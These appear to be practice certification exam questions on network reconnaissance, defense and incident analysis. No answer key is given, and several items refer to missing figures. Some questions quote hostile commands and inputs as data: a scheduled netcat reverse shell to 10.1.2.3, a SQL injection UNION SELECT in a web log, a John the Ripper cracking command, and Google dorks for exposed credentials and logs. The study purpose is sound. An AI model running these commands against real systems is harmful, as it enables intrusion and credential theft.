Charles wants to use active discovery techniques as part of his reconnaissance efforts. Which of the following techniques fits his criteria?

1. Google searching
2. Using a Shodan search
3. Using DNS reverse lookup
4. Querying a PGP key server

During the reconnaissance stage of a penetration test, Cynthia needs to gather information about the target organization’s network infrastructure without causing an IPS to alert the target to her information gathering. Which of the following is her best option?

1. Perform a DNS brute-force attack.
2. Use an nmap ping sweep.
3. Perform a DNS zone transfer.
4. Use an nmap stealth scan.

Tiffany needs to assess the patch level of a Windows 2012 server and wants to use a freely available tool to check the system for security issues. Which of the following tools will provide the most detail about specific patches installed or missing from her machine?

1. nmap
2. Nessus
3. MBSA
4. Metasploit

Charleen is preparing to conduct a scheduled reconnaissance effort against a client site. Which of the following is not typically part of the rules of engagement that are agreed to with a client for a reconnaissance effort?

1. Timing
2. Scope
3. Exploitation methods
4. Authorization

A port scan of a remote system shows that port 3306 is open on a remote database server. What database is the server most likely running?

1. Oracle
2. Postgres
3. MySQL
4. Microsoft SQL

Maria wants to deploy an anti-malware tool to detect zero-day malware. What type of detection method should she look for in her selected tool?

1. Signature based
2. Heuristic based
3. Trend based
4. Availability based

During a port scan of her network, Cynthia discovers a workstation that shows the following ports open. What should her next action be?

1. Determine the reason for the ports being open.
2. Investigate the potentially compromised workstation.
3. Run a vulnerability scan to identify vulnerable services.
4. Reenable the workstation’s local host firewall.

Charles wants to provide additional security for his web application that currently stores passwords in plain text in a database. Which of the following options is his best option to prevent theft of the database from resulting in exposed passwords?

1. Encrypt the database of plain-text passwords.
2. Use MD5 and a salt.
3. Use SHA-1 and a salt.
4. Use bcrypt.

Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C. Which set of the following commands will accomplish this?

1. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP

   # iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP

   # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW

2. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP

   # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP

   # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW

3. # iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW

   # iptables -I INPUT 2 -s 10.2.0.0.134 -j ALLOW

   # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP

4. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP

   # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP

   # iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW

After filling out the scoping document for a penetration test, including details of what tools, techniques, and targets are included in the test, what is the next step that Jessica needs to take to conduct the test?

1. Port scan the target systems.
2. Get sign-off on the document.
3. Begin passive fingerprinting.
4. Notify local law enforcement.

Brian’s penetration testing efforts have resulted in him successfully gaining access to a target system. Using the diagram shown here, identify what step occurs at point B in the NIST SP800-115 process flow.

1. Vulnerability scanning
2. Discovery
3. Escalating privileges
4. Pivoting

Chris wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use ssh?

1. Add an iptables rule blocking root logins.
2. Add root to the sudoers group.
3. Change sshd_config to deny root login.
4. Add a network IPS rule to block root logins.

What term is often used for attackers during a penetration test?

1. Black team
2. Blue team
3. Red team
4. Green team

Charles uses the following command while investigating a Windows workstation used by his organization’s vice president of finance who only works during normal business hours. Charles believes that the workstation has been used without permission by members of his organization’s cleaning staff after-hours. What does he know if the user ID shown is the only user ID able to log into the system, and he is investigating on August 12, 2017?

C:Usersigfish>wmic netlogin get name,lastlogon,badpasswordcount
BadPasswordCount                LastLogon                    Name
NT AUTHORITYSYSTEM 0            20170811203748.000000-240     Financeigfish

1. The account has been compromised.
2. No logins have occurred.
3. The last login was during business hours.
4. Charles cannot make any determinations from this information.

Lauren’s honeynet, shown here, is configured to use a segment of unused network space that has no legitimate servers in it. What type of threats is this design particularly useful for detecting?

1. Zero-day attacks
2. SQL injection
3. Network scans
4. DDoS attacks

Angela is designing her organization’s data center network and wants to establish a secure zone and a DMZ. If Angela wants to ensure that user accounts and traffic that manage systems in the DMZ are easily auditable and that all access can be logged while helping prevent negative impacts from compromised or infected workstations, which of the following solutions is Angela’s best design option?

1. Administrative virtual machines run on administrator workstations
2. A jump host
3. A bastion host
4. Use ssh or RDP from administrative workstations

Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the netflow shown here?

Date flow start   Duration     Proto    Src      IP Addr:Port  Dst IP Addr:Port      Packets   Bytes   Flows 
2017-07-11        14:39:30.606 0.448    TCP      192.168.2.1:1451->10.2.3.1:443      10        1510    1
2017-07-11        14:39:30.826 0.448    TCP      10.2.3.1:443->192.168.2.1:1451      7         360     1
2017-07-11        14:45:32.495 18.492   TCP      10.6.2.4:443->192.168.2.1:1496      5         1107    1
2017-07-11        14:45:32.255 18.888   TCP      192.168.2.1:1496->10.6.2.4:443      11        1840    1
2017-07-11        14:46:54.983 0.000    TCP      192.168.2.1:1496->10.6.2.4:443      1         49      1
2008-12-09        16:45:34.764 0.362    TCP      10.6.2.4:443->192.168.2.1:4292      4         1392    1
2008-12-09        16:45:37.516 0.676    TCP      192.168.2.1:4292->10.6.2.4:443      4         462     1
2008-12-09        16:46:38.028 0.000    TCP      192.168.2.1:4292->10.6.2.4:443      2         89      1
2017-07-11        14:45:23.811 0.454    TCP      192.168.2.1:1515->10.6.2.5:443      4         263     1
2017-07-11        14:45:28.879 1.638    TCP      192.168.2.1:1505->10.6.2.5:443      18        2932    1
2017-07-11        14:45:29.087 2.288    TCP      10.6.2.5:443->192.168.2.1:1505      37        48125   1
2017-07-11        14:45:54.027 0.224    TCP      10.6.2.5:443->192.168.2.1:1515      2         1256    1
2017-07-11        14:45:58.551 4.328    TCP      192.168.2.1:1525->10.6.2.5:443      10        648     1
2017-07-11        14:45:58.759 0.920    TCP      10.6.2.5:443->192.168.2.1:1525      12        15792   1
2017-07-11        14:46:32.227 14.796   TCP      192.168.2.1:1525->10.8.2.5:443      31        1700    1
2017-07-11        14:46:52.983 0.000    TCP      192.168.2.1:1505->10.8.2.5:443      1         40      1

1. 1
2. 3
3. 4
4. 5

Rick is auditing a Cisco router configuration and notes the following line:

login block-for 120 attempt 5 with 60

What type of setting has been enabled?

1. A DDoS prevention setting
2. A back-off setting
3. A telnet security setting
4. An autologin prevention setting

As a U.S. government employee, Michael is required to ensure that the network devices that he procures have a verified chain of custody for every chip and component that goes into them. What is this program known as?

1. Gray market procurement
2. Trusted Foundry
3. White market procurement
4. Chain of Procurement

During a network reconnaissance exercise, Chris gains access to a PC located in a secure network. If Chris wants to locate database and web servers that the company uses, what command-line tool can he use to gather information about other systems on the local network without installing additional tools or sending additional traffic?

1. ping
2. traceroute
3. nmap
4. netstat

Alice is conducting a penetration test of a client’s systems. As part of her test, she gathers information from the social media feeds of staff members who work for her client. What phase of the NIST penetration testing process is she currently in?

1. Social engineering
2. Discovery
3. Analysis
4. Social media profiling

What is the default nmap scan type when nmap is not provided with a scan type flag?

1. A TCP FIN scan
2. A TCP connect scan
3. A TCP SYN scan
4. A UDP scan

Isaac wants to grab the banner from a remote web server using commonly available tools. Which of the following tools cannot be used to grab the banner from the remote host?

1. netcat
2. telnet
3. wget
4. ftp

Charles wants to limit what potential attackers can gather during passive or semipassive reconnaissance activities. Which of the following actions will typically reduce his organization’s footprint the most?

1. Limit information available via the organizational website without authentication.
2. Use a secure domain registration.
3. Limit technology references in job postings.
4. Purge all document metadata before posting.

Cassandra’s nmap scan of an open wireless network (192.168.10/24) shows the following host at IP address 192.168.1.1. Which of the following is most likely to be the type of system at that IP address based on the scan results shown?

1. A virtual machine
2. A wireless router
3. A broadband router
4. A print server

While reviewing Shodan scan data for his organization, John notices the following entry. Which of the following is false?

1. The device allows telnet connections.
2. There is a console port on a nonstandard port.
3. The device requires sshv1.
4. The device is an automated tank gauge.

Lauren has local access to a Windows workstation and wants to gather information about the organization that it belongs to. What type of information can she gain if she executes the command nbtstat -c?

1. MAC addresses and IP addresses of local systems
2. NetBIOS name-to-IP address mappings
3. A list of all NetBIOS systems that the host is connected to
4. NetBIOS MAC-to-IP address mappings

Tracy believes that a historic version of her target’s website may contain data she needs for her reconnaissance. What tool can she use to review snapshots of the website from multiple points in time?

1. Time Machine
2. Morlock
3. Wayback Machine
4. Her target’s web cache

After Kristen received a copy of an nmap scan run by a penetration tester that her company hired, she knows that the tester used the -O flag. What type of information should she expect to see included in the output other than open ports?

1. OCMP status
2. Other ports
3. Objective port assessment data in verbose mode
4. Operating system and Common Platform Enumeration (CPE) data

Andrea wants to conduct a passive footprinting exercise against a target company. Which of the following techniques is not suited to a passive footprinting process?

1. WHOIS lookups
2. Banner grabbing
3. BGP looking glass usage
4. Registrar checks

While gathering reconnaissance data for a penetration test, Charleen uses the MxToolbox MX Lookup tool. What can she determine from the response to her query shown here?

1. The mail servers are blacklisted.
2. The mail servers have failed an SMTP test.
3. The mail servers are clustered.
4. There are two MX hosts listed in DNS.

Alex wants to scan a protected network and has gained access to a system that can communicate to both his scanning system and the internal network, as shown in the image here. What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap on system A?

1. A reflection scan
2. A proxy scan
3. A randomized host scan
4. A ping-through scan

As a member of a blue team, John observed the following behavior during an external penetration test. What should he report to his managers at the conclusion of the test?

1. A significant increase in latency
2. A significant increase in packet loss
3. Latency and packet loss both increased.
4. No significant issues were observed.

As part of an organization-wide red team exercise, Frank is able to use a known vulnerability to compromise an Apache web server. Once he has gained access, what should his next step be if he wants to use the system to pivot to protected systems behind the DMZ that the web server resides in?

1. Vulnerability scanning
2. Privilege escalation
3. Patching
4. Installing additional tools

As part of her malware analysis process, Caitlyn diagrams the high-level functions and processes that the malware uses to accomplish its goals. What is this process known as?

1. Static analysis
2. Composition
3. Dynamic analysis
4. Decomposition

Alex has been asked to assess the likelihood of reconnaissance activities against her organization (a small, regional business). Her first assignment is to determine the likelihood of port scans against systems in her organization’s DMZ. How should she rate the likelihood of this occurring?

1. Low
2. Medium
3. High

4. There is not enough information for Alex to provide a rating.

Use the following scenario for the questions 37 through 39.

Lucy is the SOC operator for her organization and is responsible for monitoring her organization’s SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.

While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization’s New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?

1. Heuristic
2. Behavior
3. Availability
4. Anomaly

After her discovery in the first part of this question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows:

Send a SMS alert every 30 seconds when systems do not send logs for more than 1 minute.

The average administrator at Lucy’s organization is responsible for 150 to 300 machines.

What danger does Lucy’s alert create?

1. A DDoS that causes administrators to not be able to access systems
2. A network outage
3. Administrators may ignore or filter the alerts.
4. A memory spike

Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?

1. Trend
2. Availability
3. Heuristic

4. Behavior

During his analysis of a malware sample, John reviews the malware files and binaries without running them. What type of analysis is this?

1. Automated analysis
2. Dynamic analysis
3. Static analysis
4. Heuristic analysis

The company that Lauren works for is making significant investments in infrastructure-as-a-service hosting to replace its traditional data center. Members of her organization’s management have expressed concerns about data remanence when Lauren’s team moves from one virtual host to another in their cloud service provider’s environment. What should she instruct her team to do to avoid this concern?

1. Zero-wipe drives before moving systems.
2. Use full-disk encryption.
3. Use data masking.
4. Span multiple virtual disks to fragment data.

Lucca wants to prevent workstations on his network from attacking each other. If Lucca’s corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?

1. An IPS
2. An IDS
3. A HIPS
4. A HIDS

Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action?

1. #iptables-policy INPUT DROP
2. #iptables-policy SERVICE DROP
3. #iptables-policy OUTPUT DROP
4. #iptables-policy FORWARD DROP

The company that Dan works for has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment?

1. Use a different scanning tool.
2. Rely on vendor testing and audits.
3. Engage a third-party tester.
4. Use a VPN to scan inside the vendor’s security perimeter.

Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device?

1. The MAC address
2. The OS flags
3. The system’s banner
4. The IP address

Laura’s organization has been receiving a large amount of spam email sent specifically to the email addresses listed in her organization’s domain registrations. Which of the following techniques will help her organization limit this type of spam?

1. DNS query rate limiting
2. CAPTCHAs
3. Using a proxy service
4. Blacklisting

Eric believes that his organization has a number of vulnerable systems that have been scanned by third parties. If he wants to check publicly available vulnerability information, which of the following methods are best suited to performing this type of passive reconnaissance?

1. Use the worldwide nmap database.
2. Search for his domain in Shodan.
3. Use the OpenVAS central vulnerability data repository.
4. Check against the CVE database for his domain.

Adam knows that netcat is a useful penetration testing tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool?

1. File transfer
2. Port scanner
3. Encrypted shell
4. Reverse shell

Which of the following tools can be used to passively gather the information required to generate a network topology map?

1. Wireshark
2. nmap
3. SolarWinds Network Mapper
4. Nessus

Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches?

1. Google whacks
2. SuperGoogles
3. Google dorks
4. Google gizmos

What type of control review will focus on change management as a major element in its assessment scope?

1. Operational control review
2. Technical control review
3. Detective control review
4. Responsive control review

As part of her reconnaissance process for her organization’s internal security review, Olivia uses Shodan to search for hosts within her target’s IP range. She discovers the following Shodan entry listing for one of her target’s devices. What should she do with this information?

1. Activate the incident response process.
2. Contact the device administrator.
3. Log in to validate the finding.
4. Nothing, because this is a false positive.

Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?

1. Use sha1sum to generate a hash for the file and write a script to check it periodically.
2. Install and use Tripwire.
3. Periodically check the MAC information for the file using a script.
4. Encrypt the file and keep the key secret so the file cannot be modified.

Selah has been tasked with gathering information to increase her penetration testing team’s understanding of their customer’s Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs?

1. nmap
2. theHarvester
3. Shodan
4. osint-ng

While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?

1. An encrypted RAT
2. A VPN application
3. A secure web browser
4. A base64-encoded packet transfer utility

Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?

1. grep
2. more
3. less
4. strings

While investigating a malware infection, Lauren discovers that the hosts file for the system she is reviewing contains multiple entries, as shown here:

0.0.0.0     symantec.com
0.0.0.0     mcafee.com
0.0.0.0     microsoft.com
0.0.0.0     kapersky.com

Why would the malware make this change?

1. To redirect 0.0.0.0 to known sites
2. To prevent antivirus updates
3. To prevent other attackers from compromising the system
4. To enable remote access to the system

Alice believes that one of her users may be taking malicious action on the systems she has access to. When she walks past her user’s desktop, she sees the following command on the screen:

user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt

What is the user attempting to do?

1. They are attempting to hash a file.
2. They are attempting to crack hashed passwords.
3. They are attempting to crack encrypted passwords.
4. They are attempting a pass-the-hash attack.

nmap provides a standardized way to name hardware and software that it detects. What is this called?

1. CVE
2. HardwareEnum
3. CPE
4. GearScript

Charles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do?

1. Search for use of privileged ports in sequential order.
2. Search for connections to ports in the /var/syslog directory.
3. Log all kernel messages to detect scans.
4. Install additional tools that can detect scans and send the logs to syslog.

Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this?

1. nbtstat -o
2. nbtstat -r
3. nbtstat -s
4. nbtstat -c

Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.

root      507  0.0  0.1 258268  3288 ?     Ssl  15:52  0:00 /usr/sbin/rsyslogd -n
message+  508  0.0  0.2  44176  5160 ?     Ss   15:52  0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root      523  0.0  0.3 281092  6312 ?     Ssl  15:52  0:00 /usr/lib/accountsservice/accounts-daemon
root      524  0.0  0.7 389760 15956 ?     Ssl  15:52  0:00 /usr/sbin/NetworkManager --no-daemon
root      527  0.0  0.1  28432  2992 ?     Ss   15:52  0:00 /lib/systemd/systemd-logind
apache    714  0.0  0.1  27416  2748 ?     Ss   15:52  0:00 /www/temp/webmin
root      617  0.0  0.1  19312  2056 ?     Ss   15:52  0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root      644  0.0  0.1 245472  2444 ?     Sl   15:52  0:01 /usr/sbin/VBoxService
root      653  0.0  0.0  12828  1848 tty1  Ss+  15:52  0:00 /sbin/agetty --noclear tty1 linux
root      661  0.0  0.3 285428  8088 ?     Ssl  15:52  0:00 /usr/lib/policykit-1/polkitd --no-debug
root      663  0.0  0.3 364752  7600 ?     Ssl  15:52  0:00 /usr/sbin/gdm3
root      846  0.0  0.5 285816 10884 ?     Ssl  15:53  0:00 /usr/lib/upower/upowerd
root      867  0.0  0.3 235180  7272 ?     Sl   15:53  0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+  877  0.0  0.2  46892  4816 ?     Ss   15:53  0:00 /lib/systemd/systemd --user
Debian-+  878  0.0  0.0  62672  1596 ?     S    15:53  0:00 (sd-pam)

1. 508
2. 617
3. 846
4. 714

While reviewing the filesystem of a potentially compromised system, Angela sees the following output when running ls -la. What should her next action be after seeing this?

1. Continue to search for other changes.
2. Run diff against the password file.
3. Immediately change her password.
4. Check the passwd binary against a known good version.

Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with a SYN-ACK, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using?

1. SYN cookies
2. ACK-ACK
3. TCP frogging
4. SYN replay

What two phases of the NIST penetration testing cycle are often repeated during a test?

1. Planning and discovery
2. Discovery and attack
3. Planning and attack
4. Discovery and reporting

Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?

1. Enable host firewalls.
2. Install patches for those services.
3. Turn off the services for each appliance.
4. Place a network firewall between the devices and the rest of the network.

Lauren is performing passive intelligence gathering and discovers a directory filled with photos taken by her target organization’s staff. If she wants to review the metadata from the photos, what tool can she use to do so?

1. Strings
2. Exiftool
3. Wireshark
4. Stegdetect

Lauren’s network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command:

at \workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe

What does it do?

1. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.
2. It uses the AT command to dial a remote host via NetBIOS.
3. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30.
4. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.

While conducting reconnaissance of his own organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management?

1. Self-signed certificates do not provide secure encryption for site visitors.
2. Self-signed certificates can be revoked only by the original creator.
3. Self-signed certificates will cause warnings or error messages.
4. None of the above

Isaac has access to a Windows system that is a member of the local Active Directory domain as part of his white-box penetration test. Which of the following commands might provide information about other systems on the network?

1. net use
2. net user
3. net group
4. net config

During the reconnaissance stage of a penetration test, Fred calls a number of staff at the target organization. Using a script he prepared, Fred introduces himself as part of the support team for their recently installed software and asks for information about the software and its configuration. What is this technique called?

1. Pretexting
2. OSINT
3. A tag-out
4. Profiling

Geoff needs to lock down a Windows workstation that has recently been scanned using nmap with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system’s firewall for externally initiated connections?

1. 80, 135, 139, and 445
2. 80, 445, and 3389
3. 135, 139, and 445
4. No ports should be open.

Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior?

1. A firewall
2. A netflow collector
3. A honeypot
4. A BGP monitor

During a white-box penetration test, Luke finds that he is suddenly unable to connect to the target network. What has likely happened?

1. Automated shunning
2. Network link failure
3. Back-off algorithms
4. A BGP route change

Adam’s port scan returns results on six TCP ports: 22, 80, 443, 515, 631, and 9100. If Adam needs to guess what type of device this is based on these ports, what is his best guess?

1. A web server
2. An FTP server
3. A printer
4. A proxy server

Cassandra believes that attackers were able to extract a volume shadow copy of a workstation belonging to her organization’s Windows domain administrator. What information should she not report as being potentially exposed?

1. All files on the user’s desktop
2. Password hashes
3. Domain details
4. Plain-text Windows account passwords

Lauren is contacted by a concerned administrator who notes that almost all of their Windows 10 Enterprise workstations are reporting the following issue after a patch deployment. What important policy may be missing?

1. Active hours
2. Required reboots
3. Automatic updates
4. Network time synchronization

Jarett needs to protect an application server against resource exhaustion attacks. Which of the following techniques is best suited to surviving a large-scale DDoS attack?

1. Enable application sharding.
2. Review each query and implement query optimization.
3. Implement aggressive aging at the organization’s firewall.
4. Employ a CDN.

In his role as the SOC operator, Frank regularly scans a variety of servers in his organization. After two months of reporting multiple vulnerabilities on a Windows file server, Frank recently escalated the issue to the server administrator’s manager.

At the next weekly scan window, Frank noticed that all of the vulnerabilities were no longer active; however, ports 137, 139, and 445 were still showing as open. What most likely happened?

1. The server administrator blocked the scanner with a firewall.
2. The server was patched.
3. The vulnerability plug-ins were updated and no longer report false positives.
4. The system was offline.

While conducting reconnaissance, Greg discovers what he believes is an SMTP service running on an alternate port. What technique should he use to manually validate his guess?

1. Send an email via the open port.
2. Send an SMTP probe.
3. telnet to the port.
4. ssh to the port.

Adam is reviewing his organization’s security footprint by conducting reconnaissance activities. After reviewing a list of Google dorks, he runs the following search:

"mysqli_connect" ext:inc

If it returns data, what should he recommend in his report to management?

1. Block MySQL connections from remote hosts.
2. Initiate the organization’s incident response process.
3. Immediately change MySQL passwords and review configurations.
4. Change all MySQL connection strings.

Rick’s manager wants to present the most trustworthy certificate possible for a website. What type of certificate should Rick get?

1. EV
2. DV
3. OV
4. IV

While reviewing web server logs, Danielle notices the following entry. What occurred?

10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200

1. A theme was changed.
2. A file was not found.
3. There was an attempt to edit the 404 page.
4. The 404 page was displayed.

While reviewing his Apache logs, Charles discovers the following entry. What has occurred?

10.1.1.1 - - [27/Jun/2017:11:42:22 -0500] "GET
/query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,
name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

1. A successful database query
2. A PHP overflow attack
3. A SQL injection attack
4. An unsuccessful database query

What two pieces of information does nmap need to estimate network path distance?

1. IP address and TTL
2. TTL and operating system
3. Operating system and BGP flags
4. TCP flags and IP address

Charles needs to make sure he has found the correct social media profile for a target of his OSINT process. Which of the following includes the three critical items needed to uniquely identify the majority of Americans?

1. Height, weight, and eye color
2. Date of birth, gender, and zip code
3. Zodiac sign, gender, and zip code
4. Age, height, and weight

While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:

nc -l -p 43501 < example.zip

What happened?

1. The user set up a reverse shell running as example.zip.
2. The user set up netcat as a listener to push example.zip.
3. The user set up a remote shell running as example.zip.
4. The user set up netcat to receive example.zip.

During an on-site penetration test of a small business, Bob scans outward to a known host to determine the outbound network topology. What information can he gather from the results provided by Zenmap?

1. There are two nodes on the local network.
2. There is a firewall at IP address 96.120.24.121.
3. There is an IDS at IP address 96.120.24.121.
4. He should scan the 10.0.2.0/24 network.

Chris discovers the following entries in /var/log/auth.log. What is most likely occurring?

Aug  6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug  6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug  6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug  6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug  6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug  6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug  6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug  6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug  6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug  6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2

1. A user has forgotten their password.
2. A brute-force attack against the root account
3. A misconfigured service
4. A denial-of-service attack against the root account

As part of his reconnaissance effort, Charles uses the following Google search string:

"authentication failure; logname=" ext:log;site:example.com

What will he find if he receives results from his target’s domain?

1. A list of successful logins
2. A list of log names
3. A list of failed logins
4. A list of log files

While reviewing email logs for his domain’s email server, Rick notices that a single remote host is sending email to usernames that appear to be in alphabetical order:

• [email protected]
• [email protected]
• [email protected]
• [email protected]
• [email protected]
• [email protected]

• ...

  This behavior continues for thousands of entries, resulting in many bounced email messages, but some make it through. What type of reconnaissance has Rick encountered?

1. Brute force
2. Domain harvesting
3. Domain probe
4. Email list builder

Which of the following capabilities is not a typical part of an SIEM system?

1. Alerting
2. Performance management
3. Data aggregation
4. Log retention

What major issue would Charles face if he relied on hashing malware packages to identify malware packages?

1. Hashing can be spoofed.
2. Collisions can result in false positives.
3. Hashing cannot identify unknown malware.

4. Hashing relies on unencrypted malware samples.

Use the following network diagram and scenario to answer the next three questions:

Lauren is a security analyst who has been tasked with performing nmap scans of her organization’s network. She is a new hire and has been given this logical diagram of the organization’s network but has not been provided with any additional detail.

Lauren wants to determine what IP addresses to scan from location A. How can she find this information?

1. Scan the organization’s web server and then scan the other 255 IP addresses in its subnet.
2. Query DNS to find her organization’s registered hosts.
3. Contact ICANN to request the data.
4. Use traceroute to identify the network that the organization’s domain resides in.

If Lauren runs a scan from location B that targets the servers on the data center network and then runs a scan from location C, what differences is she most likely to see between the scans?

1. The scans will match.
2. Scans from location C will show no open ports.
3. Scans from location C will show fewer open ports.
4. Scans from location C will show more open ports.

Lauren wants to perform regular scans of the entire organizational network but only has a budget that supports buying hardware for a single scanner. Where should she place her scanner to have the most visibility and impact?

1. Location A
2. Location B
3. Location C
4. Location D

Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where should she add a rule intended to block this type of traffic?

1. The firewall
2. The router
3. The distribution switch
4. The Windows 2012 server

Alex has been asked to investigate a call to one of his organization’s system administrators that is believed to have led to a breach. The administrator described that call by saying that the caller identified themselves as the assistant to the director of sales and said that they needed access to a file that was critical to a sales presentation with a major client but that their laptop had died. The administrator provided a link to the file, which included the organization’s sales data for the quarter. What type of social engineering occurred?

1. Baiting
2. Quid pro quo
3. Pretexting
4. Whaling

Which of the three key objectives of cybersecurity is often ensured by using techniques like hashing and the use of tools like Tripwire?

1. Confidentiality
2. Integrity
3. Identification
4. Availability

The netflow collector that Sam’s security team uses is capable of handling 1 gigabit of traffic per second. As Sam’s organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam’s team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data?

1. Enable QoS
2. Enable netflow compression
3. Enable sampling
4. None of the above

Senior C-level executives at the organization that Alex works for have received targeted phishing messages that include a fake organizational login page link and a message that states that their passwords were inadvertently reset during a scheduled maintenance window. What type of attack should Alex describe in his after action report?

1. Tuna phishing
2. Whaling
3. Spear phishing
4. SAML phishing

Brandon wants to perform a WHOIS query for a system he believes is located in Europe. Which NIC should he select to have the greatest likelihood of success for his query?

1. AFRINIC
2. APNIC
3. RIPE
4. LACNIC

Chris wants to determine what TCP ports are listening on a Windows system. What is his best option to determine this from the command line?

1. Use arp -a.
2. Use netstat -lt.
3. Use nmap -t 127.0.0.1.
4. There is not a Windows command do to this.

As part of her system hardening process for a Windows 10 workstation, Lauren runs the Microsoft Baseline System Analyzer. She sees the following result after MBSA runs. What can she determine from this scan?

1. The system has been compromised, and shares allow all users to read and execute administrative files.
2. The system has default administrative shares enabled.
3. The system is part of a domain that uses administrative shares to manage systems.
4. The shares are properly secured and pose no threat to the system.

While Greg was performing a port scan of a critical server system, the system administrators at his company observed the behavior shown here in their network management software suite. What action should Greg take after he is shown this chart?

1. Increase the number of concurrent scans.
2. Decrease the number of ports scanned.
3. Decrease the number of concurrent scans.
4. Increase the number of ports scanned.

An access control system that relies on the operating system to constrain the ability of a subject to perform operations is an example of what type of access control system?

1. A discretionary access control system
2. A role-based access control system
3. A mandatory access control system
4. A level-based access control system

While reviewing Apache logs, Janet sees the following entries as well as hundreds of others from the same source IP. What should Janet report has occurred?

[ 21/Jul/2017:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[ 21/Jul/2017:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[ 21/Jul/2017:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[ 21/Jul/2017:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
